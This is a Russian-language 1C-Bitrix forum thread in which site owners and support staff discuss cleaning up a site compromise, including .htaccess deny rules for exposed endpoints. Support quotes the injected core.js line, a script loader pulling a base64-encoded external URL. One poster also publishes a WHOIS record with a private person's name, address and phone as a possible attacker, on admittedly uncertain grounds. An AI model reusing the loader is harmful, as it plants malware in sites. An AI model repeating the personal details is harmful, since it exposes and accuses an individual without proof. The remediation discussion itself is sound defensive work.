|
Разработчикам |
|
ну дак по консоли и раскручивай - бери самые первые ошибки и смотри
у меня тоже там много записей было, но первая именно на core.js - поправил только там и везде заработало поищи по вхождению aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz и storejscdn может тот же файл, только в другом месте иньекция |
|
|
|
|
|
|||
|
|
|
Значит проблема в другом файле. Остается поиск. Ещё модно просканировать бесплатным imunifyav. |
|||
|
|
|
|
первые сообщения в консоли какие? на что ругается?
|
|
|
|
|
Все файлы которые указаны в этом посте были без кода сайта. Вместо кодов в них было написано Putin_HUILO и русский корабль-пшел.н - сокращенно. Причем в каждом из этих файлов было 9999 строк, т.е их заполнили прям столбцами. Размер файлов был около 2-3 мегабайт каждый. У меня была файловая копия сайта от августа 22г, оттуда я просто заменил все те файлы которые были изменены, постепенно сайт начал оживать. закрыл на все файлы доступ на уровне сервера,папку tmp вынес за рамки директории сайта. Модуль vote удалил. Ограничил доступы в файлах /bitrix/www/bitrix/admin/.htaccess <Files ~ "^(site_checker)\.php$>deny from all</Files> /home/bitrix/www/bitrix/tools/.htaccess <Files ~ "^(html_editor_action|mail_entry|upload)\.php$> deny from all</Files> /bitrix/www/bitrix/modules/main/include/.htaccess <Files ~ "^(virtual_file_system)\.php$> deny from all</Files> /bitrix/www/bitrix/components/bitrix/sender.mail.editor/.htaccess <Files ~ "^(ajax)\.php$> deny from all</Files> И еще одно. В почтовых настройках были созданы агенты или задания на спам статистики и прочей ненужной фигни на адрес администратора(заданный по умолчанию) Мне на почту стали сыпаться просто тонны писем о том что пользователь был заблокирован,что идут XSS атаки и DOS и прочая ересь. По логам нашел обидчика,но может быть это и не он. Инфа просто так, для справки. IP:37.57.145.71 person: Oleksii V Yaroshenko address: Prirechnaya 25a address: Kiev address: Ukraine phone: +38 097-437-27-17 nic-hdl: OVY5-RIPE mnt-by: TRIOLANMNT created: 2016-08-30T12:25:29Z Вроде как пока тишина. Сделал снимок сервака на всякий случай и еще одну файловую копию сайта. Новостной модуль вырвал отдельно в папку, а то вручную собирать новости как то не айс после восстановления базы данных. |
|||
|
|
|
|
Техподдержка Битрикс:
У вас в файле /bitrix/modules/main/include/prolog.php были добавлены строки вызывающие скрипт: // \n<sc ript src=" (?) ript>;
В файл /bitrix/js/main/core/core.js была добавлена строка: \bs=document.createElement(script);s.src=atob(aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz);document.head.appendChild(s);
Сайт заработал корректно только после ручного удаления вредоносных строк. А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php То есть у всех, кто писал выше не хватает удаления main.php |
|
|
|
|
|
|||
|
|
|
|
это само собой,
а дайте ссылку на первых трех страницах о том, что нужно удалить main.php Я видимо пропустил |
|
|
|
|
|
||||
|
|
|
|||
© 2001-2025 «Битрикс», «1С-Битрикс». Работает на 1С-Битрикс: Управление сайтом. 
Политика конфиденциальности